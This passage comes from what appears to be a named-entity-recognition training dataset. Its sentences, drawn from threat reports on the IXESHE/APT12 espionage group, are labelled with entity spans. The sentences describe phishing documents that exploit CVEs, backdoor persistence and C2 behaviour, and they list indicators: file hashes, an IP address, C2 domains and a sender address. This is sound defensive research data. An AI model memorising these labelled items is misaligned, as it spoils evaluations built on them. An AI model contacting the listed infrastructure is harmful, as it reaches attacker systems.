zero-day vulnerabilities .", "spans": {"Vulnerability: CVE-2009-4324": [[48, 61]], "Vulnerability: CVE-2011-0609": [[66, 79]], "Vulnerability: zero-day": [[135, 143]]}, "info": {"id": "aptner_train_002094", "source": "aptner_train"}} {"text": 
"The IXESHE attackers also used an exploit that affected Microsoft Excel — CVE-2009-3129 .", "spans": {"Organization: IXESHE": [[4, 10]], "Organization: Microsoft": [[56, 65]], "System: Excel": [[66, 71]], "Vulnerability: CVE-2009-3129": [[74, 87]]}, "info": {"id": "aptner_train_002095", "source": "aptner_train"}} {"text": "Every IXESHE case we examined revealed that the original infection vector was a targeted email with a PDF exploit as attachment .", "spans": {"Organization: IXESHE": [[6, 12]], "System: email": [[89, 94]], "System: PDF": [[102, 105]]}, "info": {"id": "aptner_train_002096", "source": "aptner_train"}} {"text": "Older versions also used an XLS exploit .", "spans": {"System: XLS": [[28, 31]]}, "info": {"id": "aptner_train_002097", "source": "aptner_train"}} {"text": "Opening the .PDF file drops and executes a malware in a victim ’s system .", "spans": {"Indicator: .PDF": [[12, 16]]}, "info": {"id": "aptner_train_002098", "source": "aptner_train"}} {"text": "The malware displays a blank .PDF file or a decoy document related to the targeted attack .", "spans": {}, "info": {"id": "aptner_train_002099", "source": "aptner_train"}} {"text": "The emails normally come from compromised personal accounts or are entirely spoofed .", "spans": {"System: emails": [[4, 10]]}, "info": {"id": "aptner_train_002100", "source": "aptner_train"}} {"text": "emails from spoofed senders were usually sent via mail servers in the United States and China .", "spans": {"System: emails": [[0, 6]]}, "info": {"id": "aptner_train_002101", "source": "aptner_train"}} {"text": "The malware also sets the executable file ’s attributes to “ Hidden. 
” Some of the file names the attackers used include : winhlps.exe , acrotry.exe , AcroRd32.exe , Updater.exe .", "spans": {"Indicator: winhlps.exe": [[123, 134]], "Indicator: acrotry.exe": [[137, 148]], "Indicator: AcroRd32.exe": [[151, 163]], "Indicator: Updater.exe": [[166, 177]]}, "info": {"id": "aptner_train_002102", "source": "aptner_train"}} {"text": "In order for the malware to survive rebooting , it normally creates the following registry run key : HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run .", "spans": {}, "info": {"id": "aptner_train_002103", "source": "aptner_train"}} {"text": "The registry run key , in turn , points to the malware that has been dropped .", "spans": {}, "info": {"id": "aptner_train_002104", "source": "aptner_train"}} {"text": "The value name of this entry varies from sample to sample .", "spans": {}, "info": {"id": "aptner_train_002105", "source": "aptner_train"}} {"text": "Some of the names the attackers used for it include : Adobe Assistant , Migrated .", "spans": {"System: Adobe Assistant": [[54, 69]], "System: Migrated": [[72, 80]]}, "info": {"id": "aptner_train_002106", "source": "aptner_train"}} {"text": "Upon installation , the malware starts communicating with one of its C&C servers .", "spans": {"System: C&C": [[69, 72]]}, "info": {"id": "aptner_train_002107", "source": "aptner_train"}} {"text": "Most of the samples appeared to have at least three C&C servers hard coded for redundancy .", "spans": {"System: C&C": [[52, 55]]}, "info": {"id": "aptner_train_002108", "source": "aptner_train"}} {"text": "Some samples alternatively use an FGKD.jsp or an FPK.jsp file .", "spans": {"Indicator: FGKD.jsp": [[34, 42]], "Indicator: FPK.jsp": [[49, 56]]}, "info": {"id": "aptner_train_002109", "source": "aptner_train"}} {"text": "The Base64 blob is of particular interest .", "spans": {}, "info": {"id": "aptner_train_002110", "source": "aptner_train"}} {"text": "It makes use of a custom Base64 alphabet .", "spans": 
{}, "info": {"id": "aptner_train_002111", "source": "aptner_train"}} {"text": "Once decoded , this blob reveals a standardized structure of the information sent to the registered C&C server , which includes the following details : Computer name , Local IP address , Proxy server IP and port , Malware ID .", "spans": {"System: C&C": [[100, 103]]}, "info": {"id": "aptner_train_002112", "source": "aptner_train"}} {"text": "To date , we have seen several custom Base64 alphabets , including : +NO5RZaGHviIjhYq8b4ndQ=p012ySTcCDrs/xPgUz67FM3wemKfkJLBo9VtWXlEuA , HZa4vjIiGndQ=p012y+NO5RST/xPgUz67FMhYq8b3wemKfkJLBocCDrs9VtWXlEu , j4vpGZaHnIdQ=i012y+N/zPgUO5RSTx67FMhYb8q3we mKckJLBofCDrs9VtWXlEu , p12kJLBofCDrs9VtWXlEuainyj4vd+=H0GZIQNO5RST/ zPgUx67FMhYb8q3wemKc , aZHGviIj4ndQ=p012y+NO5RST/xPgUz67FMhYq8b3wemKfkJLBocCDrs9VtWXlEu , ZvQIajHi4ndG=p012y+NO5RST/xPgUz67FMhYq8b3wemKfkJLBocCDrs9VtWXlEu .", "spans": {}, "info": {"id": "aptner_train_002113", "source": "aptner_train"}} {"text": "Some similarities exist across different versions of the Base64 alphabet , which indicates that these are most likely not completely randomly generated .", "spans": {}, "info": {"id": "aptner_train_002114", "source": "aptner_train"}} {"text": "Instead , the attackers manually cut and pasted older versions after altering some parts .", "spans": {}, "info": {"id": "aptner_train_002115", "source": "aptner_train"}} {"text": "The malware ID seems to be a campaign code with a different IP address for each attack .", "spans": {}, "info": {"id": "aptner_train_002116", "source": "aptner_train"}} {"text": "Some of the campaign codes we have seen include : CRML_0505 , CRML_MIL , Firebox4 , JUST_0525 , ML0628 , MW0629 , OM222 .", "spans": {"Malware: CRML_0505": [[50, 59]], "Malware: CRML_MIL": [[62, 70]], "Malware: Firebox4": [[73, 81]], "Malware: JUST_0525": [[84, 93]], "Malware: ML0628": [[96, 102]], "Malware: MW0629": [[105, 111]], "Malware: OM222": [[114, 119]]}, "info": {"id": "aptner_train_002117", 
"source": "aptner_train"}} {"text": "The IXESHE campaign has been successfully executing targeted attacks since 2009 .", "spans": {"Organization: IXESHE": [[4, 10]]}, "info": {"id": "aptner_train_002118", "source": "aptner_train"}} {"text": "The attackers primarily use malicious .PDF files that exploit vulnerabilities in Adobe Reader , Acrobat , and Flash Player , including the use of two zero-day exploits—one in 2009 and another in 2011 .", "spans": {"Indicator: .PDF": [[38, 42]], "System: Adobe Reader": [[81, 93]], "System: Acrobat": [[96, 103]], "System: Flash Player": [[110, 122]], "Vulnerability: zero-day": [[150, 158]]}, "info": {"id": "aptner_train_002119", "source": "aptner_train"}} {"text": "While the attackers primarily targeted East Asian governments in the past , they have also started targeting a telecommunications company and electronics manufacturers .", "spans": {}, "info": {"id": "aptner_train_002120", "source": "aptner_train"}} {"text": "They kept track of their targeted attacks by embedding a “ campaign tag ” in the malware that appears to describe when each attack was launched and , in some cases , the nature of its target .", "spans": {}, "info": {"id": "aptner_train_002121", "source": "aptner_train"}} {"text": "We found more than 40 of these campaign tags .", "spans": {}, "info": {"id": "aptner_train_002122", "source": "aptner_train"}} {"text": "The IXESHE attackers are notable for their use of compromised machines within a target ’s internal network as C&C servers .", "spans": {"Organization: IXESHE": [[4, 10]], "System: C&C": [[110, 113]]}, "info": {"id": "aptner_train_002123", "source": "aptner_train"}} {"text": "This helped disguise their activities .", "spans": {}, "info": {"id": "aptner_train_002124", "source": "aptner_train"}} {"text": "In addition , the attackers ’ use of the proxy tool , HTran , also helped mask their true location .", "spans": {"System: HTran": [[54, 59]]}, "info": {"id": "aptner_train_002125", "source": 
"aptner_train"}} {"text": "While their identities remain unknown , the attackers behind the IXESHE campaign demonstrated that they were both determined and capable .", "spans": {"Organization: IXESHE": [[65, 71]]}, "info": {"id": "aptner_train_002126", "source": "aptner_train"}} {"text": "While the malware used in the attacks were not very complicated by nature , these proved very effective .", "spans": {}, "info": {"id": "aptner_train_002127", "source": "aptner_train"}} {"text": "APT12 .", "spans": {"Organization: APT12": [[0, 5]]}, "info": {"id": "aptner_train_002128", "source": "aptner_train"}} {"text": "The attackers referred to as APT12 ( also known as IXESHE , DynCalc , and DNSCALC ) recently started a new campaign targeting organizations in Japan and Taiwan .", "spans": {"Organization: APT12": [[29, 34]], "Organization: IXESHE": [[51, 57]], "Organization: DynCalc": [[60, 67]], "Organization: DNSCALC": [[74, 81]]}, "info": {"id": "aptner_train_002129", "source": "aptner_train"}} {"text": "APT12 is believed to be a cyber espionage group thought to have links to the Chinese People's Liberation Army .", "spans": {"Organization: APT12": [[0, 5]], "Organization: Chinese People's Liberation Army": [[77, 109]]}, "info": {"id": "aptner_train_002130", "source": "aptner_train"}} {"text": "APT12 's targets are consistent with larger People's Republic of China ( PRC ) goals .", "spans": {"Organization: APT12": [[0, 5]], "Organization: People's Republic of China": [[44, 70]], "Organization: PRC": [[73, 76]]}, "info": {"id": "aptner_train_002131", "source": "aptner_train"}} {"text": "Intrusions and campaigns conducted by this group are in-line with PRC goals and self-interest in Taiwan .", "spans": {"Organization: PRC": [[66, 69]]}, "info": {"id": "aptner_train_002132", "source": "aptner_train"}} {"text": "Additionally , the new campaigns we uncovered further highlight the correlation between APT groups ceasing and retooling operations after media exposure , as APT12 used 
the same strategy after compromising the New York Times in Oct 2012 .", "spans": {"Organization: APT12": [[158, 163]], "Organization: New York Times": [[210, 224]]}, "info": {"id": "aptner_train_002133", "source": "aptner_train"}} {"text": "Much like Darwin ’s theory of biological evolution , APT12 been forced to evolve and adapt in order to maintain its mission .", "spans": {"Organization: APT12": [[53, 58]]}, "info": {"id": "aptner_train_002134", "source": "aptner_train"}} {"text": "FireEye researchers discovered two possibly related campaigns utilizing two other backdoors known as THREEBYTE and WATERSPOUT .", "spans": {"Organization: FireEye": [[0, 7]], "Malware: THREEBYTE": [[101, 110]], "Malware: WATERSPOUT": [[115, 125]]}, "info": {"id": "aptner_train_002135", "source": "aptner_train"}} {"text": "Both backdoors were dropped from malicious documents built utilizing the “ Tran Duy Linh ” exploit kit , which exploited CVE-2012-0158 .", "spans": {"System: Tran Duy Linh": [[75, 88]], "Vulnerability: CVE-2012-0158": [[121, 134]]}, "info": {"id": "aptner_train_002136", "source": "aptner_train"}} {"text": "These documents were also emailed to organizations in Japan and Taiwan .", "spans": {}, "info": {"id": "aptner_train_002137", "source": "aptner_train"}} {"text": "While APT12 has previously used THREEBYTE , it is unclear if APT12 was responsible for the recently discovered campaign utilizing THREEBYTE .", "spans": {"Organization: APT12": [[6, 11], [61, 66]], "Malware: THREEBYTE": [[32, 41], [130, 139]]}, "info": {"id": "aptner_train_002138", "source": "aptner_train"}} {"text": "Similarly , WATERSPOUT is a newly discovered backdoor and the threat actors behind the campaign have not been positively identified .", "spans": {"Malware: WATERSPOUT": [[12, 22]]}, "info": {"id": "aptner_train_002139", "source": "aptner_train"}} {"text": "However , the WATERSPOUT campaign shared several traits with the RIPTIDE and HIGHTIDE campaign that we have attributed to APT12 .", 
"spans": {"Malware: WATERSPOUT": [[14, 24]], "Malware: RIPTIDE": [[65, 72]], "Malware: HIGHTIDE": [[77, 85]], "Organization: APT12": [[122, 127]]}, "info": {"id": "aptner_train_002140", "source": "aptner_train"}} {"text": "From October 2012 to May 2014, FireEye observed APT12 utilizing RIPTIDE , a proxy-aware backdoor that communicates via HTTP to a hard-coded command and control ( C2 ) server .", "spans": {"Organization: FireEye": [[31, 38]], "Organization: APT12": [[48, 53]], "Malware: RIPTIDE": [[64, 71]], "System: command and control": [[140, 159]], "System: C2": [[162, 164]]}, "info": {"id": "aptner_train_002141", "source": "aptner_train"}} {"text": "RIPTIDE ’s first communication with its C2 server fetches an encryption key , and the RC4 encryption key is used to encrypt all further communication .", "spans": {"Malware: RIPTIDE": [[0, 7]], "System: C2": [[40, 42]]}, "info": {"id": "aptner_train_002142", "source": "aptner_train"}} {"text": "In June 2014, Arbor Networks published an article describing the RIPTIDE backdoor and its C2 infrastructure in great depth .", "spans": {"Organization: Arbor": [[14, 19]], "Malware: RIPTIDE backdoor": [[65, 81]], "System: C2": [[90, 92]]}, "info": {"id": "aptner_train_002143", "source": "aptner_train"}} {"text": "The blog highlighted that the backdoor was utilized in campaigns from March 2011 till May 2014 .", "spans": {}, "info": {"id": "aptner_train_002144", "source": "aptner_train"}} {"text": "Following the release of the article , FireEye observed a distinct change in RIPTIDE ’s protocols and strings .", "spans": {"Organization: FireEye": [[39, 46]], "Malware: RIPTIDE": [[77, 84]]}, "info": {"id": "aptner_train_002145", "source": "aptner_train"}} {"text": "We suspect this change was a direct result of the Arbor blog post in order to decrease detection of RIPTIDE by security vendors .", "spans": {"Organization: Arbor": [[50, 55]], "Malware: RIPTIDE": [[100, 107]]}, "info": {"id": "aptner_train_002146", "source": 
"aptner_train"}} {"text": "The changes to RIPTIDE were significant enough to circumvent existing RIPTIDE detection rules .", "spans": {"Malware: RIPTIDE": [[15, 22], [70, 77]]}, "info": {"id": "aptner_train_002147", "source": "aptner_train"}} {"text": "FireEye dubbed this new malware family HIGHTIDE .", "spans": {"Organization: FireEye": [[0, 7]], "Malware: HIGHTIDE": [[39, 47]]}, "info": {"id": "aptner_train_002148", "source": "aptner_train"}} {"text": "On Sunday August 24, 2014 we observed a spear phish email sent to a Taiwanese government ministry .", "spans": {"System: email": [[52, 57]], "Organization: Taiwanese government": [[68, 88]]}, "info": {"id": "aptner_train_002149", "source": "aptner_train"}} {"text": "Attached to this email was a malicious Microsoft Word document ( MD5: f6fafb7c30b1114befc93f39d0698560 ) that exploited CVE-2012-0158 .", "spans": {"System: email": [[17, 22]], "Organization: Microsoft": [[39, 48]], "System: Word": [[49, 53]], "Indicator: f6fafb7c30b1114befc93f39d0698560": [[70, 102]], "Vulnerability: CVE-2012-0158": [[120, 133]]}, "info": {"id": "aptner_train_002150", "source": "aptner_train"}} {"text": "It is worth noting that this email appeared to have been sent from another Taiwanese Government employee , implying that the email was sent from a valid but compromised account .", "spans": {"System: email": [[29, 34], [125, 130]], "Organization: Taiwanese Government": [[75, 95]]}, "info": {"id": "aptner_train_002151", "source": "aptner_train"}} {"text": "HIGHTIDE : 6e59861931fa2796ee107dc27bfdd480 .", "spans": {"Malware: HIGHTIDE": [[0, 8]], "Indicator: 6e59861931fa2796ee107dc27bfdd480": [[11, 43]]}, "info": {"id": "aptner_train_002152", "source": "aptner_train"}} {"text": "The HIGHTIDE backdoor connected directly to 141.108.2.157 .", "spans": {"Malware: HIGHTIDE backdoor": [[4, 21]], "Indicator: 141.108.2.157": [[44, 57]]}, "info": {"id": "aptner_train_002153", "source": "aptner_train"}} {"text": "If you compare the HTTP GET request 
from the RIPTIDE samples to the HTTP GET request from the HIGHTIDE samples you can see the malware author changed the following items : User Agent , Format and structure of the HTTP Uniform Resource Identifier ( URI ) .", "spans": {"Malware: RIPTIDE": [[45, 52]], "Malware: HIGHTIDE": [[94, 102]], "System: Uniform Resource Identifier": [[218, 245]], "System: URI": [[248, 251]]}, "info": {"id": "aptner_train_002154", "source": "aptner_train"}} {"text": "FireEye observed APT12 deliver these exploit documents via phishing emails in multiple cases .", "spans": {"Organization: FireEye": [[0, 7]], "Organization: APT12": [[17, 22]], "System: emails": [[68, 74]]}, "info": {"id": "aptner_train_002156", "source": "aptner_train"}} {"text": "Based on past APT12 activity , we expect the threat group to continue to utilize phishing as a malware delivery method . 0824.1.doc : f6fafb7c30b1114befc93f39d0698560 , CVE-2012-0158 .", "spans": {"Organization: APT12": [[14, 19]], "Indicator: 0824.1.doc": [[121, 131]], "Indicator: f6fafb7c30b1114befc93f39d0698560": [[134, 166]], "Vulnerability: CVE-2012-0158": [[169, 182]]}, "info": {"id": "aptner_train_002157", "source": "aptner_train"}} {"text": "Jason_invitation.doc : 00a95fb30be2d6271c491545f6c6a707 , CVE-2012-0158 .", "spans": {"Indicator: Jason_invitation.doc": [[0, 20]], "Indicator: 00a95fb30be2d6271c491545f6c6a707": [[23, 55]], "Vulnerability: CVE-2012-0158": [[58, 71]]}, "info": {"id": "aptner_train_002158", "source": "aptner_train"}} {"text": "When the file is opened , it drops HIGHTIDE in the form of an executable file onto the infected system .", "spans": {"Malware: HIGHTIDE": [[35, 43]]}, "info": {"id": "aptner_train_002159", "source": "aptner_train"}} {"text": "RIPTIDE and HIGHTIDE differ on several points : executable file location , image base address , the User-Agent within the GET requests , and the format of the URI .", "spans": {"Malware: RIPTIDE": [[0, 7]], "Malware: HIGHTIDE": [[12, 20]], "System: URI": [[159, 162]]}, 
"info": {"id": "aptner_train_002160", "source": "aptner_train"}} {"text": "The RIPTIDE exploit document drops its executable file into the C:\\Documents and Settings\\{user}\\Application Data\\Location folder while the HIGHTIDE exploit document drops its executable file into the C:\\DOCUMENTS and SETTINGS\\{user}\\LOCAL SETTINGS\\Temp\\ folder .", "spans": {"Malware: RIPTIDE": [[4, 11]], "Malware: HIGHTIDE": [[140, 148]]}, "info": {"id": "aptner_train_002161", "source": "aptner_train"}} {"text": "All but one sample that we identified were written to this folder as word.exe .", "spans": {"Indicator: word.exe": [[69, 77]]}, "info": {"id": "aptner_train_002162", "source": "aptner_train"}} {"text": "The one outlier was written as winword.exe .", "spans": {"Indicator: winword.exe": [[31, 42]]}, "info": {"id": "aptner_train_002163", "source": "aptner_train"}} {"text": "Research into this HIGHTIDE campaign revealed APT12 targeted multiple Taiwanese Government organizations between August 22 and 28 .", "spans": {"Malware: HIGHTIDE": [[19, 27]], "Organization: APT12": [[46, 51]], "Organization: Taiwanese Government": [[70, 90]]}, "info": {"id": "aptner_train_002164", "source": "aptner_train"}} {"text": "On Monday August 25, 2014 we observed a different spear phish email sent from lilywang823@gmail.com to a technology company located in Taiwan .", "spans": {"System: email": [[62, 67]], "Indicator: lilywang823@gmail.com": [[78, 99]]}, "info": {"id": "aptner_train_002165", "source": "aptner_train"}} {"text": "This spear phish contained a malicious Word document that exploited CVE-2012-0158 .", "spans": {"System: Word": [[39, 43]], "Vulnerability: CVE-2012-0158": [[68, 81]]}, "info": {"id": "aptner_train_002166", "source": "aptner_train"}} {"text": "The MD5 of the exploit document was e009b95ff7b69cbbebc538b2c5728b11 .", "spans": {"Indicator: e009b95ff7b69cbbebc538b2c5728b11": [[36, 68]]}, "info": {"id": "aptner_train_002167", "source": "aptner_train"}} {"text": "Similar to the 
newly discovered HIGHTIDE samples documented above , this malicious document dropped a backdoor to C:\\DOCUMENTS and SETTINGS\\{user}\\LOCAL SETTINGS\\Temp\\word.exe .", "spans": {"Malware: HIGHTIDE": [[32, 40]], "Indicator: SETTINGS\\Temp\\word.exe": [[153, 175]]}, "info": {"id": "aptner_train_002168", "source": "aptner_train"}} {"text": "THREEBYTE : 16e627dbe730488b1c3d448bfc9096e2 .", "spans": {"Malware: THREEBYTE": [[0, 9]], "Indicator: 16e627dbe730488b1c3d448bfc9096e2": [[12, 44]]}, "info": {"id": "aptner_train_002169", "source": "aptner_train"}} {"text": "This backdoor sent the following callback traffic to video.csmcpr.com .", "spans": {"Indicator: video.csmcpr.com": [[53, 69]]}, "info": {"id": "aptner_train_002170", "source": "aptner_train"}} {"text": "The THREEBYTE spear phishing incident ( while not yet attributed ) shared the following characteristics with the above HIGHTIDE campaign attributed to APT12 : The THREEBYTE backdoor was compiled two days after the HIGHTIDE backdoors ;", "spans": {"Malware: THREEBYTE": [[4, 13]], "Malware: HIGHTIDE": [[119, 127]], "Organization: APT12": [[151, 156]], "Malware: THREEBYTE backdoor": [[163, 181]], "Malware: HIGHTIDE backdoors": [[214, 232]]}, "info": {"id": "aptner_train_002171", "source": "aptner_train"}} {"text": "Both the THREEBYTE and HIGHTIDE backdoors were used in attacks targeting organizations in Taiwan ;", "spans": {"Malware: THREEBYTE": [[9, 18]], "Malware: HIGHTIDE backdoors": [[23, 41]]}, "info": {"id": "aptner_train_002172", "source": "aptner_train"}} {"text": "Both the THREEBYTE and HIGHTIDE backdoors were written to the same filepath of C:\\DOCUMENTS and SETTINGS\\{user}\\LOCAL SETTINGS\\Temp\\word.exe ;", "spans": {"Malware: THREEBYTE": [[9, 18]], "Malware: HIGHTIDE backdoors": [[23, 41]], "Indicator: SETTINGS\\Temp\\word.exe": [[118, 140]]}, "info": {"id": "aptner_train_002173", "source": "aptner_train"}} {"text": "APT12 has previously used the THREEBYTE backdoor .", "spans": {"Organization: 
APT12": [[0, 5]], "Malware: THREEBYTE backdoor": [[30, 48]]}, "info": {"id": "aptner_train_002174", "source": "aptner_train"}} {"text": "On August 25, 2014, we observed another round of spear phishing emails targeting a high-technology company in Japan .", "spans": {"System: emails": [[64, 70]]}, "info": {"id": "aptner_train_002175", "source": "aptner_train"}} {"text": "Attached to this email was another malicious document that was designed to exploit CVE-2012-0158 .", "spans": {"System: email": [[17, 22]], "Vulnerability: CVE-2012-0158": [[83, 96]]}, "info": {"id": "aptner_train_002176", "source": "aptner_train"}} {"text": "This malicious Word document had an MD5 of 499bec15ac83f2c8998f03917b63652e and dropped a backdoor to C:\\DOCUMENTS and SETTINGS\\{user}\\LOCAL SETTINGS\\Temp\\word.exe .", "spans": {"Indicator: 499bec15ac83f2c8998f03917b63652e": [[43, 75]], "Indicator: SETTINGS\\Temp\\word.exe": [[141, 163]]}, "info": {"id": "aptner_train_002177", "source": "aptner_train"}} {"text": "The backdoor had the following properties :", "spans": {}, "info": {"id": "aptner_train_002178", "source": "aptner_train"}} {"text": "WATERSPOUT :", "spans": {"Malware: WATERSPOUT": [[0, 10]]}, "info": {"id": "aptner_train_002179", "source": "aptner_train"}} {"text": "f9cfda6062a8ac9e332186a7ec0e706a .", "spans": {"Indicator: f9cfda6062a8ac9e332186a7ec0e706a": [[0, 32]]}, "info": {"id": "aptner_train_002180", "source": "aptner_train"}} {"text": "The backdoor connects to a command and control server at icc.ignorelist.com .", "spans": {"Indicator: icc.ignorelist.com": [[57, 75]]}, "info": {"id": "aptner_train_002181", "source": "aptner_train"}} {"text": "Similar to RIPTIDE and HIGHTIDE , the WATERSPOUT backdoor is an HTTP based backdoor that communicates with its C2 server .", "spans": {"Malware: RIPTIDE": [[11, 18]], "Malware: HIGHTIDE": [[23, 31]], "Malware: WATERSPOUT backdoor": [[38, 57]], "System: C2": [[111, 113]]}, "info": {"id": "aptner_train_002182", "source": 
"aptner_train"}} {"text": "Although there are no current infrastructure ties to link this backdoor to APT12 , there are several data points that show a possible tie to the same actors :", "spans": {"Organization: APT12": [[75, 80]]}, "info": {"id": "aptner_train_002183", "source": "aptner_train"}} {"text": "Same initial delivery method ( spear phishing email ) with a Microsoft Word Document exploiting CVE-2012-0158 .", "spans": {"System: email": [[46, 51]], "Organization: Microsoft": [[61, 70]], "System: Word": [[71, 75]], "Vulnerability: CVE-2012-0158": [[96, 109]]}, "info": {"id": "aptner_train_002184", "source": "aptner_train"}} {"text": "The same “ Tran Duy Linh ” Microsoft Word Exploit Kit was used in delivery of this backdoor .", "spans": {"System: Tran Duy Linh": [[11, 24]], "Organization: Microsoft": [[27, 36]], "System: Word": [[37, 41]]}, "info": {"id": "aptner_train_002185", "source": "aptner_train"}} {"text": "Similar Targets were observed where the threat actors utilized this backdoor : Japanese Tech Company , Taiwanese Government Organizations , Organizations in the Asia-Pacific Region that are of Interest to China .", "spans": {"Organization: Japanese Tech Company": [[79, 100]], "Organization: Taiwanese Government": [[103, 123]]}, "info": {"id": "aptner_train_002186", "source": "aptner_train"}} {"text": "The WATERSPOUT backdoor was written to the same file path as the HIGHTIDE backdoors : C:\\DOCUMENTS and SETTINGS\\{user}\\LOCAL SETTINGS\\Temp\\word.exe , C:\\DOCUMENTS and SETTINGS\\{user}\\LOCAL SETTINGS\\Temp\\winword.exe .", "spans": {"Malware: WATERSPOUT backdoor": [[4, 23]], "Malware: HIGHTIDE backdoors": [[65, 83]], "Indicator: SETTINGS\\Temp\\word.exe": [[125, 147]], "Indicator: SETTINGS\\Temp\\winword.exe": [[189, 214]]}, "info": {"id": "aptner_train_002187", "source": "aptner_train"}} {"text": "WATERSPOUT was compiled within two days of the last HIGHTIDE backdoor and on the same day as the THREEBYTE backdoor .", "spans": {"Malware: 
WATERSPOUT": [[0, 10]], "Malware: HIGHTIDE backdoor": [[52, 69]], "Malware: THREEBYTE backdoor": [[97, 115]]}, "info": {"id": "aptner_train_002188", "source": "aptner_train"}} {"text": "APT12 closely monitors online media related to its tools and operations and reacts when its tools are publicly disclosed .", "spans": {"Organization: APT12": [[0, 5]]}, "info": {"id": "aptner_train_002189", "source": "aptner_train"}} {"text": "APT12 has the ability to adapt quickly to public exposures with new tools , tactics , and procedures ( TTPs ) .", "spans": {"Organization: APT12": [[0, 5]]}, "info": {"id": "aptner_train_002190", "source": "aptner_train"}} {"text": "Public disclosures may result in an immediate change in APT12 ’s tools .", "spans": {"Organization: APT12": [[56, 61]]}, "info": {"id": "aptner_train_002191", "source": "aptner_train"}} {"text": "These changes may be temporary and FireEye believes they are aimed at decreasing detection of their tools until a more permanent and effective TTP change can be implemented ( e.g. 
, WATERSPOUT ) .", "spans": {"Organization: FireEye": [[35, 42]], "Malware: WATERSPOUT": [[182, 192]]}, "info": {"id": "aptner_train_002192", "source": "aptner_train"}} {"text": "Although these points do not definitively tie WATERSPOUT to APT12 , they do indicate a possible connection between the WATERSPOUT campaign , the THREEBYTE campaign , and the HIGHTIDE campaign attributed to APT12 .", "spans": {"Malware: WATERSPOUT": [[46, 56], [119, 129]], "Organization: APT12": [[60, 65], [206, 211]], "Malware: THREEBYTE": [[145, 154]], "Malware: HIGHTIDE": [[174, 182]]}, "info": {"id": "aptner_train_002193", "source": "aptner_train"}} {"text": "These development efforts may have resulted in the emergence of the WATERSPOUT backdoor .", "spans": {"Malware: WATERSPOUT backdoor": [[68, 87]]}, "info": {"id": "aptner_train_002195", "source": "aptner_train"}} {"text": "Though public disclosures resulted in APT12 adaptations , FireEye observed only a brief pause in APT12 activity before the threat actors returned to normal activity levels .", "spans": {"Organization: APT12": [[38, 43], [97, 102]], "Organization: FireEye": [[58, 65]]}, "info": {"id": "aptner_train_002196", "source": "aptner_train"}} {"text": "Similarly , the public disclosure of APT12 ’s intrusion at the New York Times also led to only a brief pause in the threat group ’s activity and immediate changes in TTPs .", "spans": {"Organization: APT12": [[37, 42]], "Organization: New York Times": [[63, 77]]}, "info": {"id": "aptner_train_002197", "source": "aptner_train"}} {"text": "The pause and retooling by APT12 was covered in the Mandiant 2014 M-Trends report .", "spans": {"Organization: APT12": [[27, 32]], "Organization: Mandiant": [[52, 60]], "Organization: M-Trends": [[66, 74]]}, "info": {"id": "aptner_train_002198", "source": "aptner_train"}} {"text": "Currently , APT12 continues to target organizations and conduct cyber operations using its new tools .", "spans": {"Organization: APT12": [[12, 17]]}, "info": 
{"id": "aptner_train_002199", "source": "aptner_train"}} {"text": "Most recently , FireEye observed HIGHTIDE at multiple Taiwan-based organizations and the suspected APT12 WATERSPOUT backdoor at a Japan-based electronics company .", "spans": {"Organization: FireEye": [[16, 23]], "Malware: HIGHTIDE": [[33, 41]], "Organization: APT12": [[99, 104]], "Malware: WATERSPOUT backdoor": [[105, 124]]}, "info": {"id": "aptner_train_002200", "source": "aptner_train"}} {"text": "APT12 .", "spans": {"Organization: APT12": [[0, 5]]}, "info": {"id": "aptner_train_002201", "source": "aptner_train"}} {"text": "The attackers behind the breach of the New York Times ’ computer network late last year appear to be mounting fresh assaults that leverage new and improved versions of malware .", "spans": {"Organization: New York Times": [[39, 53]]}, "info": {"id": "aptner_train_002202", "source": "aptner_train"}} {"text": "The new campaigns mark the first significant stirrings from the group since it went silent in January in the wake of a detailed expose of the group and its exploits — and a retooling of what security researchers believe is a massive spying operation based in China .", "spans": {}, "info": {"id": "aptner_train_002203", "source": "aptner_train"}} {"text": "The newest campaign uses updated versions of Aumlib and Ixeshe .", "spans": {"Malware: Aumlib": [[45, 51]], "Malware: Ixeshe": [[56, 62]]}, "info": {"id": "aptner_train_002204", "source": "aptner_train"}} {"text": "Aumlib , which for years has been used in targeted attacks , now encodes certain HTTP communications .", "spans": {"Malware: Aumlib": [[0, 6]]}, "info": {"id": "aptner_train_002205", "source": "aptner_train"}} {"text": "FireEye researchers spotted the malware when analyzing a recent attempted attack on an organization involved in shaping economic policy .", "spans": {"Organization: FireEye": [[0, 7]]}, "info": {"id": "aptner_train_002206", "source": "aptner_train"}} {"text": "And a new version of Ixeshe , which 
has been in service since 2009 to attack targets in East Asia , uses new network traffic patterns , possibly to evade traditional network security systems .", "spans": {"Malware: Ixeshe": [[21, 27]]}, "info": {"id": "aptner_train_002207", "source": "aptner_train"}} {"text": "The updates are significant for both of the longstanding malware families ; before this year , Aumlib had not changed since at least May 2011, and Ixeshe had not evolved since at least December 2011 .", "spans": {"Malware: Aumlib": [[95, 101]]}, "info": {"id": "aptner_train_002208", "source": "aptner_train"}} {"text": "Cybercriminals are constantly evolving and adapting in their attempts to bypass computer network defenses .", "spans": {}, "info": {"id": "aptner_train_002209", "source": "aptner_train"}} {"text": "But , larger , more successful threat actors tend to evolve at a slower rate .", "spans": {}, "info": {"id": "aptner_train_002210", "source": "aptner_train"}} {"text": "As long as these actors regularly achieve their objective ( stealing sensitive data ) , they are not motivated to update or rethink their techniques , tactics , or procedures ( TTPs ) .", "spans": {}, "info": {"id": "aptner_train_002211", "source": "aptner_train"}} {"text": "These threat actors ’ tactics follow the same principles of evolution – successful techniques propagate , and unsuccessful ones are abandoned .", "spans": {}, "info": {"id": "aptner_train_002212", "source": "aptner_train"}} {"text": "Attackers do not change their approach unless an external force or environmental shift compels them to .", "spans": {}, "info": {"id": "aptner_train_002213", "source": "aptner_train"}} {"text": "As the old saying goes : If it ain’t broke , don’t fix it .", "spans": {}, "info": {"id": "aptner_train_002214", "source": "aptner_train"}} {"text": "So when a larger , successful threat actor changes up tactics , the move always piques our attention .", "spans": {}, "info": {"id": "aptner_train_002215", "source": 
